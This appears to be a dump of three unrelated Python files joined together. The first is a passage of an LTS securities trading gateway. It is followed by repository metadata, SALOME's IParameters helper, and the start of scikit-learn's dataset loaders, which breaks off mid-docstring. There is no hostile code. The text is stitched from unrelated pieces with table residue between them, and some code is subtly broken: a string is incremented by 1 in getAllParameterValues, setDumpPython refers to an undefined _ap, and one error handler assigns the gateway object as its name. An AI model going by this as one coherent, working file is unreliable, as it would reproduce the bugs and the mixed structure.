order.direction = DIRECTION_SHORT
else:
order.direction = DIRECTION_UNKNOWN
# 开平
if data['CombOffsetFlag'] == '0':
order.offset = OFFSET_OPEN
elif data['CombOffsetFlag'] == '1':
order.offset = OFFSET_CLOSE
else:
order.offset = OFFSET_UNKNOWN
# 状态
if data['OrderStatus'] == '0':
order.status = STATUS_ALLTRADED
elif data['OrderStatus'] == '1':
order.status = STATUS_PARTTRADED
elif data['OrderStatus'] == '3':
order.status = STATUS_NOTTRADED
elif data['OrderStatus'] == '5':
order.status = STATUS_CANCELLED
else:
order.status = STATUS_UNKNOWN
# 价格、报单量等数值
order.price = float(data['LimitPrice'])
order.totalVolume = data['VolumeTotalOriginal']
order.tradedVolume = data['VolumeTraded']
order.orderTime = data['InsertTime']
order.cancelTime = data['CancelTime']
order.frontID = data['FrontID']
order.sessionID = data['SessionID']
# CTP的报单号一致性维护需要基于frontID, sessionID, orderID三个字段
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
# 推送
self.gateway.onOrder(order)
#----------------------------------------------------------------------
def onRtnTrade(self, data):
"""成交回报"""
# 创建报单数据对象
trade = VtTradeData()
trade.gatewayName = self.gatewayName
# 保存代码和报单号
trade.symbol = data['InstrumentID']
trade.exchange = exchangeMapReverse.get(data['ExchangeID'], '')
trade.vtSymbol = '.'.join([trade.symbol, trade.exchange])
trade.tradeID = data['TradeID']
trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])
trade.orderID = data['OrderRef']
trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID])
# 方向
trade.direction = directionMapReverse.get(data['Direction'], '')
# 开平
trade.offset = offsetMapReverse.get(data['OffsetFlag'], '')
# 价格、报单量等数值
trade.price = float(data['Price'])
trade.volume = data['Volume']
trade.tradeTime = data['TradeTime']
# 推送
self.gateway.onTrade(trade)
#----------------------------------------------------------------------
def onErrRtnOrderInsert(self, data, error):
"""发单错误回报(交易所)"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onErrRtnOrderAction(self, data, error):
"""撤单错误回报(交易所)"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspFundOutByLiber(self, data, error, n, last):
"""LTS发起出金应答"""
pass
#----------------------------------------------------------------------
def onRtnFundOutByLiber(self, data):
"""LTS发起出金通知"""
pass
#----------------------------------------------------------------------
def onErrRtnFundOutByLiber(self, data, error):
"""LTS发起出金错误回报"""
pass
#----------------------------------------------------------------------
def onRtnFundInByBank(self, data):
"""银行发起入金通知"""
pass
#----------------------------------------------------------------------
def onRspFundInterTransfer(self, data, error, n, last):
"""资金内转应答"""
pass
#----------------------------------------------------------------------
def onRtnFundInterTransferSerial(self, data):
"""资金内转流水通知"""
pass
#----------------------------------------------------------------------
def onErrRtnFundInterTransfer(self, data, error):
"""资金内转错误回报"""
pass
#----------------------------------------------------------------------
def connect(self, userID, password, brokerID, address, productInfo, authCode):
"""初始化连接"""
self.userID = userID # 账号
self.password = password # 密码
self.brokerID = brokerID # 经纪商代码
self.address = address # 服务器地址
self.productInfo = productInfo
self.authCode = authCode
# 如果尚未建立服务器连接,则进行连接
if not self.connectionStatus:
# 创建C++环境中的API对象,这里传入的参数是需要用来保存.con文件的文件夹路径
path = getTempPath(self.gatewayName + '_')
self.createFtdcTraderApi(path)
# 设置数据同步模式为推送从今日开始所有数据
self.subscribePrivateTopic(0)
self.subscribePublicTopic(0)
# 注册服务器地址
self.registerFront(self.address)
# 初始化连接,成功会调用onFrontConnected
self.init()
# 若已经连接但尚未登录,则进行登录
else:
if not self.loginStatus:
self.login()
#----------------------------------------------------------------------
def login(self):
"""连接服务器"""
# 如果填入了用户名密码等,则登录
if self.userID and self.password and self.brokerID:
req = {}
req['UserID'] = self.userID
req['Password'] = self.password
req['BrokerID'] = self.brokerID
req['UserProductInfo'] = self.productInfo
req['AuthCode'] = self.authCode
req['RandCode'] = self.randCode
self.reqID += 1
self.reqUserLogin(req, self.reqID)
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
self.reqID += 1
self.orderRef += 1
req = {}
req['InstrumentID'] = str(orderReq.symbol)
req['LimitPrice'] = str(orderReq.price) # LTS里的价格是字符串
req['VolumeTotalOriginal'] = int(orderReq.volume)
req['ExchangeID'] = exchangeMap.get(orderReq.exchange, '')
# 下面如果由于传入的类型本接口不支持,则会返回空字符串
try:
req['OrderPriceType'] = priceTypeMap[orderReq.priceType]
req['Direction'] = directionMap[orderReq.direction]
req['CombOffsetFlag'] = offsetMap[orderReq.offset]
req['ExchangeID'] = exchangeMap[orderReq.exchange]
except KeyError:
return ''
req['OrderRef'] = str(self.orderRef)
req['InvestorID'] = self.userID
req['UserID'] = self.userID
req['BrokerID'] = self.brokerID
req['CombHedgeFlag'] = defineDict['SECURITY_FTDC_HF_Speculation'] # 投机单
req['ContingentCondition'] = defineDict['SECURITY_FTDC_CC_Immediately'] # 立即发单
req['ForceCloseReason'] = defineDict['SECURITY_FTDC_FCC_NotForceClose'] # 非强平
req['IsAutoSuspend'] = 0 # 非自动挂起
req['TimeCondition'] = defineDict['SECURITY_FTDC_TC_GFD'] # 今日有效
req['VolumeCondition'] = defineDict['SECURITY_FTDC_VC_AV'] # 任意成交量
req['MinVolume'] = 1 # 最小成交量为1
req['UserForceClose'] = 0
self.reqOrderInsert(req, self.reqID)
# 返回订单号(字符串),便于某些算法进行动态管理
vtOrderID = '.'.join([self.gatewayName, str(self.orderRef)])
return vtOrderID
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
self.reqID += 1
req = {}
req['InstrumentID'] = cancelOrderReq.symbol
req['ExchangeID'] = cancelOrderReq.exchange
req['OrderRef'] = cancelOrderReq.orderID
req['FrontID'] = cancelOrderReq.frontID
req['SessionID'] = cancelOrderReq.sessionID
req['ActionFlag'] = defineDict['SECURITY_FTDC_AF_Delete']
req['BrokerID'] = self.brokerID
req['InvestorID'] = self.userID
self.reqOrderAction(req, self.reqID)
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.exit()
########################################################################
class LtsQryApi(QryApi):
"""Lts账户查询实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""API对象的初始化函数"""
super(LtsQryApi, self).__init__()
self.gateway = gateway # gateway对象
self.gatewayName = gateway.gatewayName # gateway对象名称
self.reqID = EMPTY_INT # 操作请求编号
self.orderRef = EMPTY_INT # 订单编号
self.connectionStatus = False # 连接状态
self.loginStatus = False # 登录状态
self.userID = EMPTY_STRING # 账号
self.password = EMPTY_STRING # 密码
self.brokerID = EMPTY_STRING # 经纪商代码
self.address = EMPTY_STRING # 服务器地址
self.productInfo = EMPTY_STRING # 程序产品名称
self.authCode = EMPTY_STRING # 授权码
self.randCode = EMPTY_STRING # 随机码
self.frontID = EMPTY_INT # 前置机编号
self.sessionID = EMPTY_INT # 会话编号
#----------------------------------------------------------------------
def onFrontConnected(self):
"""服务器连接"""
self.connectionStatus = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'查询服务器连接成功'
self.gateway.onLog(log)
# 前置机连接后,请求随机码
self.reqID += 1
self.reqFetchAuthRandCode({}, self.reqID)
#----------------------------------------------------------------------
def onFrontDisconnected(self, n):
"""服务器断开"""
self.connectionStatus = False
self.loginStatus = False
self.gateway.tdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'查询服务器连接断开'
self.gateway.onLog(log)
#----------------------------------------------------------------------
def onHeartBeatWarning(self, n):
""""""
pass
#----------------------------------------------------------------------
def onRspError(self, error, n, last):
"""错误回报"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspUserLogin(self, data, error, n, last):
"""登陆回报"""
# 如果登录成功,推送日志信息
if error['ErrorID'] == 0:
self.frontID = str(data['FrontID'])
self.sessionID = str(data['SessionID'])
self.loginStatus = True
self.gateway.qryConnected = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'查询服务器登录完成'
self.gateway.onLog(log)
# 查询合约代码
self.reqID += 1
self.reqQryInstrument({}, self.reqID)
# 否则,推送错误信息
else:
err = VtErrorData()
err.gatewayName = self.gateway
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspUserLogout(self, data, error, n, last):
"""登出回报"""
# 如果登出成功,推送日志信息
if error['ErrorID'] == 0:
self.loginStatus = False
self.gateway.qryConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'查询服务器登出完成'
self.gateway.onLog(log)
# 否则,推送错误信息
else:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspFetchAuthRandCode(self, data, error, n, last):
"""请求随机认证码"""
self.randCode = data['RandCode']
self.login()
#----------------------------------------------------------------------
def onRspQryExchange(self, data, error, n, last):
pass
#----------------------------------------------------------------------
def onRspQryInstrument(self, data, error, n, last):
"""合约查询回报"""
contract = VtContractData()
contract.gatewayName = self.gatewayName
contract.symbol = data['InstrumentID']
contract.exchange = exchangeMapReverse[data['ExchangeID']]
contract.vtSymbol = '.'.join([contract.symbol, contract.exchange])
contract.name = data['InstrumentName'].decode('GBK')
# 合约数值
contract.size = data['VolumeMultiple']
contract.priceTick = data['PriceTick']
contract.strikePrice = data['ExecPrice']
contract.underlyingSymbol = data['MarketID']
# 合约类型
if data['ProductClass'] == '1':
contract.productClass = PRODUCT_FUTURES
elif data['ProductClass'] == '2':
contract.productClass = PRODUCT_OPTION
elif data['ProductClass'] == '3':
contract.productClass = PRODUCT_COMBINATION
elif data['ProductClass'] == '6':
contract.productClass = PRODUCT_EQUITY
elif data['ProductClass'] == '8':
contract.productClass = PRODUCT_EQUITY
else:
print data['ProductClass']
# 期权类型
if data['InstrumentType'] == '1':
contract.optionType = OPTION_CALL
elif data['InstrumentType'] == '2':
contract.optionType = OPTION_PUT
# 推送
self.gateway.onContract(contract)
if last:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易合约信息获取完成'
self.gateway.onLog(log)
#----------------------------------------------------------------------
def onRspQryInvestor(self, data, error, n, last):
"""投资者查询回报"""
pass
#----------------------------------------------------------------------
def onRspQryTradingCode(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
def onRspQryTradingAccount(self, data, error, n, last):
"""资金账户查询回报"""
account = VtAccountData()
account.gatewayName = self.gatewayName
# 账户代码
account.accountID = data['AccountID']
account.vtAccountID = '.'.join([self.gatewayName, account.accountID])
# 数值相关
account.preBalance = data['PreBalance']
account.available = data['Available']
account.commission = data['Commission']
account.margin = data['CurrMargin']
#account.closeProfit = data['CloseProfit']
#account.positionProfit = data['PositionProfit']
# 这里的balance和快期中的账户不确定是否一样,需要测试
account.balance = data['Balance']
# 推送
self.gateway.onAccount(account)
#----------------------------------------------------------------------
def onRspQryBondInterest(self, data, error, n, last):
"""债券利息查询回报"""
pass
#----------------------------------------------------------------------
def onRspQryMarketRationInfo(self, data, error, n, last):
"""市值配售查询回报"""
pass
#----------------------------------------------------------------------
def onRspQryInstrumentCommissionRate(self, data, error, n, last):
"""合约手续费查询回报"""
pass
#----------------------------------------------------------------------
def onRspQryETFInstrument(self, data, error, n, last):
"""ETF基金查询回报"""
pass
#----------------------------------------------------------------------
def onRspQryETFBasket(self, data, error, n, last):
"""ETF股票篮查询回报"""
pass
#----------------------------------------------------------------------
def onRspQryOFInstrument(self, data, error, n, last):
"""OF合约查询回报"""
pass
#----------------------------------------------------------------------
def onRspQrySFInstrument(self, data, error, n, last):
"""SF合约查询回报"""
pass
#----------------------------------------------------------------------
def onRspQryInstrumentUnitMargin(self, data, error, n, last):
"""查询单手保证金"""
pass
#----------------------------------------------------------------------
def onRspQryPreDelivInfo(self, data, error, n , last):
"""查询预交割信息"""
pass
#----------------------------------------------------------------------
def onRsyQryCreditStockAssignInfo(self, data, error, n, last):
"""查询可融券分配"""
pass
#----------------------------------------------------------------------
def onRspQryCreditCashAssignInfo(self, data, error, n , last):
"""查询可融资分配"""
pass
#----------------------------------------------------------------------
def onRsyQryConversionRate(self, data, error, n, last):
"""查询证券这算率"""
pass
#----------------------------------------------------------------------
def onRspQryHisCreditDebtInfo(self,data, error, n, last):
"""查询历史信用负债"""
pass
#----------------------------------------------------------------------
def onRspQryMarketDataStaticInfo(self, data, error, n, last):
"""查询行情静态信息"""
pass
#----------------------------------------------------------------------
def onRspQryExpireRepurchInfo(self, data, error, n, last):
"""查询到期回购信息响应"""
pass
#----------------------------------------------------------------------
def onRspQryBondPledgeRate(self, data, error, n, last):
"""查询债券质押为标准券比例"""
pass
#----------------------------------------------------------------------
def onRspQryPledgeBond(self, data, error, n, last):
"""查询债券质押代码对照关系"""
pass
#----------------------------------------------------------------------
def onRspQryOrder(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
def onRspQryTrade(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
def onRspQryInvestorPosition(self, data, error, n, last):
"""持仓查询回报"""
pos = VtPositionData()
pos.gatewayName = self.gatewayName
# 保存代码
pos.symbol = data['InstrumentID']
pos.exchange = exchangeMapReverse.get(data['ExchangeID'], '')
pos.vtSymbol = '.'.join([pos.symbol, pos.exchange])
# 方向和持仓冻结数量
pos.direction = posiDirectionMapReverse.get(data['PosiDirection'], '')
if pos.direction == DIRECTION_NET or pos.direction == DIRECTION_LONG:
pos.frozen = data['LongFrozen']
elif pos.direction == DIRECTION_SHORT:
pos.frozen = data['ShortFrozen']
# 持仓量
pos.position = data['Position']
pos.ydPosition = data['YdPosition']
# 持仓均价
if pos.position:
pos.price = data['OpenCost'] / pos.position
# VT系统持仓名
pos.vtPositionName = '.'.join([pos.vtSymbol, pos.direction])
# 推送
self.gateway.onPosition(pos)
#----------------------------------------------------------------------
def OnRspQryFundTransferSerial(self, data, error, n, last):
"""资金转账查询"""
pass
#----------------------------------------------------------------------
def onRspQryFundInterTransferSerial(self, data, error,n, last):
"""资金内转流水查询"""
pass
#----------------------------------------------------------------------
def connect(self, userID, password, brokerID, address, productInfo, authCode):
"""初始化连接"""
self.userID = userID # 账号
self.password = password # 密码
self.brokerID = brokerID # 经纪商代码
self.address = address # 服务器地址
self.productInfo = productInfo
self.authCode = authCode
# 如果尚未建立服务器连接,则进行连接
if not self.connectionStatus:
# 创建C++环境中的API对象,这里传入的参数是需要用来保存.con文件的文件夹路径
path = getTempPath(self.gatewayName + '_')
self.createFtdcQueryApi(path)
# 注册服务器地址
self.registerFront(self.address)
# 初始化连接,成功会调用onFrontConnected
self.init()
# 若已经连接但尚未登录,则进行登录
else:
if not self.loginStatus:
self.login()
#----------------------------------------------------------------------
def login(self):
"""连接服务器"""
# 如果填入了用户名密码等,则登录
if self.userID and self.password and self.brokerID:
req = {}
req['UserID'] = self.userID
req['Password'] = self.password
req['BrokerID'] = self.brokerID
req['UserProductInfo'] = self.productInfo
req['AuthCode'] = self.authCode
req['RandCode'] = self.randCode
self.reqID += 1
self.reqUserLogin(req, self.reqID)
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户"""
self.reqID += 1
#是否需要INVESTERID, BROKERID?
req = {}
req['BrokerID'] = self.brokerID
req['InvestorID'] = self.userID
self.reqQryTradingAccount(req, self.reqID)
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
self.reqID += 1
req = {}
req['BrokerID'] = self.brokerID
req['InvestorID'] = self.userID
self.reqQryInvestorPosition(req, self.reqID)
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.exit()
| mit | 3,327,887,333,510,522,000 | 5,989,183,134,610,278,000 | 34.639001 | 92 | 0.447374 | false |
FedoraScientific/salome-kernel | src/KERNEL_PY/iparameters.py | 1 | 9144 | # -*- coding: iso-8859-1 -*-
# Copyright (C) 2007-2016 CEA/DEN, EDF R&D, OPEN CASCADE
#
# Copyright (C) 2003-2007 OPEN CASCADE, EADS/CCR, LIP6, CEA/DEN,
# CEDRAT, EDF R&D, LEG, PRINCIPIA R&D, BUREAU VERITAS
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : [email protected]
#
import salome
import string
import SALOME
import SALOMEDS
import SALOME_Session_idl
PT_INTEGER = 0
PT_REAL = 1
PT_BOOLEAN = 2
PT_STRING = 3
PT_REALARRAY = 4
PT_INTARRAY = 5
PT_STRARRAY = 6
_AP_LISTS_LIST_ = "AP_LISTS_LIST"
_AP_ENTRIES_LIST_ = "AP_ENTRIES_LIST"
_AP_PROPERTIES_LIST_ = "AP_PROPERTIES_LIST"
_AP_DUMP_PYTHON_ = "AP_DUMP_PYTHON"
vp_session = None
def getSession():
global vp_session
if vp_session is None:
vp_session = salome.naming_service.Resolve("/Kernel/Session")
vp_session = vp_session._narrow(SALOME.Session)
pass
return vp_session
class IParameters:
"""
Interface IParameters was designed to provide a common way to set up
named parameters. The interface is initialized by AttributeParameter that
is used as a container of stored data.
The interface supports 3 types of named parameters:
1. Named list - a named list consists of string values.
One can append value to list (method 'append'), get a number of values
in the list (method 'nbValues'), get all values of the given list
(method 'getValues') and get names of all created named lists.
2. Parameters - that is a set of named string values associated with some named
entity. Parameter consists of tree elements: entity name, a parameter name
and a parameter value. Thus for one named entity there are an arbitrary number
of pair 'name parameter : value'.
One can add a new parameter to entry (method 'setParameter'), get a value of
a given named parameter of the given entry (method 'getParameter'), get a number
of parameters of the given entry (method 'getNbParameters'), get all names of
parameters for the given entry (method 'getAllParameterNames'), get all
values of parameters for the entry (method 'getAllParameterValues') and get all
stored entries (method 'getEntries')
3. Property - a property has a name and a string value.
One can set property (method 'setProperty'), getProperty (method 'getProperty') and
get a list of all stored properties (method 'getProperties').
Note:
Methods not mentioned above are private and is not supposed to be used
by module's developers.
"""
def __init__(self, attributeParameter, clr=False):
"""Initializes the instance. If clr parameter is True, all IAPP attribute values are cleared."""
self._ap = attributeParameter
if ( clr ): self.clear()
pass
def clear(self):
"""Clear parameters"""
self._ap.Clear()
def append(self, listName, value):
"""Appends a value to the named list"""
if self._ap is None: return -1
v = []
if self._ap.IsSet(listName, PT_STRARRAY) == 0:
if self._ap.IsSet(_AP_LISTS_LIST_, PT_STRARRAY) == 0: self._ap.SetStrArray(_AP_LISTS_LIST_, v);
if listName != _AP_ENTRIES_LIST_ and listName != _AP_PROPERTIES_LIST_:
self.append(_AP_LISTS_LIST_, listName)
pass
self._ap.SetStrArray(listName, v)
pass
v = self._ap.GetStrArray(listName)
v.append(value)
self._ap.SetStrArray(listName, v)
return (len(v)-1)
def nbValues(self, listName):
"""Returns a number of values in the named list"""
if self._ap is None: return -1
if self._ap.IsSet(listName, PT_STRARRAY) == 0: return 0
v = self._ap.GetStrArray(listName)
return len(v)
def getValues(self, listName):
"""Returns a list of values in the named list"""
v = []
if self._ap is None: return v
if self._ap.IsSet(listName, PT_STRARRAY) == 0: return v
return self._ap.GetStrArray(listName)
def getLists(self):
"""Returns a list of named lists' names"""
v = []
if self._ap is None: return v
if self._ap.IsSet(_AP_LISTS_LIST_, PT_STRARRAY) == 0: return v
return self._ap.GetStrArray(_AP_LISTS_LIST_)
def setParameter(self, entry, parameterName, value):
"""Sets a value of the named parameter for the entry"""
if self._ap is None: return
v = []
if self._ap.IsSet(entry, PT_STRARRAY) ==0:
self.append(_AP_ENTRIES_LIST_, entry) #Add the entry to the internal list of entries
self._ap.SetStrArray(entry, v)
pass
v = self._ap.GetStrArray(entry)
v.append(parameterName)
v.append(value)
self._ap.SetStrArray(entry, v)
pass
def getParameter(self, entry, parameterName):
"""Returns a value of the named parameter for the entry"""
if self._ap is None: return ""
if self._ap.IsSet(entry, PT_STRARRAY) == 0: return ""
v = self._ap.GetStrArray(entry)
length = len(v);
i = 0
while i<length:
if v[i] == parameterName: return v[i+1]
i+=1
pass
return ""
def getAllParameterNames(self, entry):
"""Returns all parameter names of the given entry"""
v = []
names = []
if self._ap is None: return v
if self._ap.IsSet(entry, PT_STRARRAY) == 0: return v
v = self._ap.GetStrArray(entry)
length = len(v)
i = 0
while i<length:
names.append(v[i])
i+=2
pass
return names
def getAllParameterValues(self, entry):
"""Returns all parameter values of the given entry"""
v = []
values = []
if self._ap is None: return v
if self._ap.IsSet(entry, PT_STRARRAY) == 0: return v
v = self._ap.GetStrArray(entry)
length = len(v)
i = 1
while i<length:
values.append(v[i]+1)
i+=2
pass
return values
def getNbParameters(self, entry):
"""Returns a number of parameters of the entry"""
if self._ap is None: return -1
if self._ap.IsSet(entry, PT_STRARRAY) == 0: return -1
return len(self._ap.GetStrArray(entry))/2
def getEntries(self):
"""Returns all entries"""
v = []
if self._ap is None: return v
if self._ap.IsSet(_AP_ENTRIES_LIST_, PT_STRARRAY) == 0: return v
return self._ap.GetStrArray(_AP_ENTRIES_LIST_)
def setProperty(self, name, value):
"""Sets a property value"""
if self._ap is None: return
if self._ap.IsSet(name, PT_STRING) == 0:
self.append(_AP_PROPERTIES_LIST_, name) #Add the property to the internal list of properties
pass
self._ap.SetString(name, value)
pass
def getProperty(self, name):
"""Returns a value of the named property"""
if self._ap is None: return ""
if self._ap.IsSet(name, PT_STRING) == 0: return ""
return self._ap.GetString(name)
def getProperties(self):
"""Returns all propetries"""
v = []
if self._ap is None: return v
if self._ap.IsSet(_AP_PROPERTIES_LIST_, PT_STRARRAY) == 0: return v
return self._ap.GetStrArray(_AP_PROPERTIES_LIST_)
def parseValue(self, value, separator, fromEnd):
"""Breaks a value string in two parts which is divided by separator."""
v = []
pos = - 1
if fromEnd == 1: pos = value.rfind(separator)
else: pos = value.find(separator)
if pos < 0:
v.append(value)
return v
part1 = value[0:pos]
part2 = value[pos+1:len(value)]
v.append(part1)
v.append(part2)
return v
def setDumpPython(self, isDumping):
"""Enables/Disables the dumping to Python"""
if self._ap is None: return
_ap.SetBool(_AP_DUMP_PYTHON_, isDumping)
pass
def isDumpPython(self):
"""Returns whether there is the dumping to Python"""
if self._ap is None: return 0
if self._ap.IsSet(_AP_DUMP_PYTHON_, PT_BOOLEAN) == 0: return 0
return self._ap.GetBool(_AP_DUMP_PYTHON_)
pass
| lgpl-2.1 | 9,083,918,216,155,791,000 | -7,290,831,093,832,906,000 | 34.858824 | 107 | 0.610127 | false |
vigilv/scikit-learn | sklearn/datasets/base.py | 196 | 18554 | """
Base IO code for all datasets
"""
# Copyright (c) 2007 David Cournapeau <[email protected]>
# 2010 Fabian Pedregosa <[email protected]>
# 2010 Olivier Grisel <[email protected]>
# License: BSD 3 clause
import os
import csv
import shutil
from os import environ
from os.path import dirname
from os.path import join
from os.path import exists
from os.path import expanduser
from os.path import isdir
from os import listdir
from os import makedirs
import numpy as np
from ..utils import check_random_state
class Bunch(dict):
"""Container object for datasets
Dictionary-like object that exposes its keys as attributes.
>>> b = Bunch(a=1, b=2)
>>> b['b']
2
>>> b.b
2
>>> b.a = 3
>>> b['a']
3
>>> b.c = 6
>>> b['c']
6
"""
def __init__(self, **kwargs):
dict.__init__(self, kwargs)
def __setattr__(self, key, value):
self[key] = value
def __getattr__(self, key):
try:
return self[key]
except KeyError:
raise AttributeError(key)
def __getstate__(self):
return self.__dict__
def get_data_home(data_home=None):
"""Return the path of the scikit-learn data dir.
This folder is used by some large dataset loaders to avoid
downloading the data several times.
By default the data dir is set to a folder named 'scikit_learn_data'
in the user home folder.
Alternatively, it can be set by the 'SCIKIT_LEARN_DATA' environment
variable or programmatically by giving an explicit folder path. The
'~' symbol is expanded to the user home folder.
If the folder does not already exist, it is automatically created.
"""
if data_home is None:
data_home = environ.get('SCIKIT_LEARN_DATA',
join('~', 'scikit_learn_data'))
data_home = expanduser(data_home)
if not exists(data_home):
makedirs(data_home)
return data_home
def clear_data_home(data_home=None):
"""Delete all the content of the data home cache."""
data_home = get_data_home(data_home)
shutil.rmtree(data_home)
def load_files(container_path, description=None, categories=None,
load_content=True, shuffle=True, encoding=None,
decode_error='strict', random_state=0):
"""Load text files with categories as subfolder names.
Individual samples are assumed to be files stored a two levels folder
structure such as the following:
container_folder/
category_1_folder/
file_1.txt
file_2.txt
...
file_42.txt
category_2_folder/
file_43.txt
file_44.txt
...
The folder names are used as supervised signal label names. The
individual file names are not important.
This function does not try to extract features into a numpy array or
scipy sparse matrix. In addition, if load_content is false it
does not try to load the files in memory.
To use text files in a scikit-learn classification or clustering
algorithm, you will need to use the `sklearn.feature_extraction.text`
module to build a feature extraction transformer that suits your
problem.
If you set load_content=True, you should also specify the encoding of
the text using the 'encoding' parameter. For many modern text files,
'utf-8' will be the correct encoding. If you leave encoding equal to None,
then the content will be made of bytes instead of Unicode, and you will
not be able to use most functions in `sklearn.feature_extraction.text`.
Similar feature extractors should be built for other kind of unstructured
data input such as images, audio, video, ...
Read more in the :ref:`User Guide <datasets>`.
Parameters
----------
container_path : string or unicode
Path to the main folder holding one subfolder per category
description: string or unicode, optional (default=None)
A paragraph describing the characteristic of the dataset: its source,
reference, etc.
categories : A collection of strings or None, optional (default=None)
If None (default), load all the categories.
If not None, list of category names to load (other categories ignored).
load_content : boolean, optional (default=True)
Whether to load or not the content of the different files. If
true a 'data' attribute containing the text information is present
in the data structure returned. If not, a filenames attribute
gives the path to the files.
encoding : string or None (default is None)
If None, do not try to decode the content of the files (e.g. for
images or other non-text content).
If not None, encoding to use to decode text files to Unicode if
load_content is True.
decode_error: {'strict', 'ignore', 'replace'}, optional
Instruction on what to do if a byte sequence is given to analyze that
contains characters not of the given `encoding`. Passed as keyword
argument 'errors' to bytes.decode.
shuffle : bool, optional (default=True)
Whether or not to shuffle the data: might be important for models that
make the assumption that the samples are independent and identically
distributed (i.i.d.), such as stochastic gradient descent.
random_state : int, RandomState instance or None, optional (default=0)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are: either
data, the raw text data to learn, or 'filenames', the files
holding it, 'target', the classification labels (integer index),
'target_names', the meaning of the labels, and 'DESCR', the full
description of the dataset.
"""
target = []
target_names = []
filenames = []
folders = [f for f in sorted(listdir(container_path))
if isdir(join(container_path, f))]
if categories is not None:
folders = [f for f in folders if f in categories]
for label, folder in enumerate(folders):
target_names.append(folder)
folder_path = join(container_path, folder)
documents = [join(folder_path, d)
for d in sorted(listdir(folder_path))]
target.extend(len(documents) * [label])
filenames.extend(documents)
# convert to array for fancy indexing
filenames = np.array(filenames)
target = np.array(target)
if shuffle:
random_state = check_random_state(random_state)
indices = np.arange(filenames.shape[0])
random_state.shuffle(indices)
filenames = filenames[indices]
target = target[indices]
if load_content:
data = []
for filename in filenames:
with open(filename, 'rb') as f:
data.append(f.read())
if encoding is not None:
data = [d.decode(encoding, decode_error) for d in data]
return Bunch(data=data,
filenames=filenames,
target_names=target_names,
target=target,
DESCR=description)
return Bunch(filenames=filenames,
target_names=target_names,
target=target,
DESCR=description)
def load_iris():
"""Load and return the iris dataset (classification).
The iris dataset is a classic and very easy multi-class classification
dataset.
================= ==============
Classes 3
Samples per class 50
Samples total 150
Dimensionality 4
Features real, positive
================= ==============
Read more in the :ref:`User Guide <datasets>`.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification labels,
'target_names', the meaning of the labels, 'feature_names', the
meaning of the features, and 'DESCR', the
full description of the dataset.
Examples
--------
Let's say you are interested in the samples 10, 25, and 50, and want to
know their class name.
>>> from sklearn.datasets import load_iris
>>> data = load_iris()
>>> data.target[[10, 25, 50]]
array([0, 0, 1])
>>> list(data.target_names)
['setosa', 'versicolor', 'virginica']
"""
module_path = dirname(__file__)
with open(join(module_path, 'data', 'iris.csv')) as csv_file:
data_file = csv.reader(csv_file)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
target_names = np.array(temp[2:])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=np.int)
for i, ir in enumerate(data_file):
data[i] = np.asarray(ir[:-1], dtype=np.float)
target[i] = np.asarray(ir[-1], dtype=np.int)
with open(join(module_path, 'descr', 'iris.rst')) as rst_file:
fdescr = rst_file.read()
return Bunch(data=data, target=target,
target_names=target_names,
DESCR=fdescr,
feature_names=['sepal length (cm)', 'sepal width (cm)',
'petal length (cm)', 'petal width (cm)'])
def load_digits(n_class=10):
"""Load and return the digits dataset (classification).
Each datapoint is a 8x8 image of a digit.
================= ==============
Classes 10
Samples per class ~180
Samples total 1797
Dimensionality 64
Features integers 0-16
================= ==============
Read more in the :ref:`User Guide <datasets>`.
Parameters
----------
n_class : integer, between 0 and 10, optional (default=10)
The number of classes to return.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'images', the images corresponding
to each sample, 'target', the classification labels for each
sample, 'target_names', the meaning of the labels, and 'DESCR',
the full description of the dataset.
Examples
--------
To load the data and visualize the images::
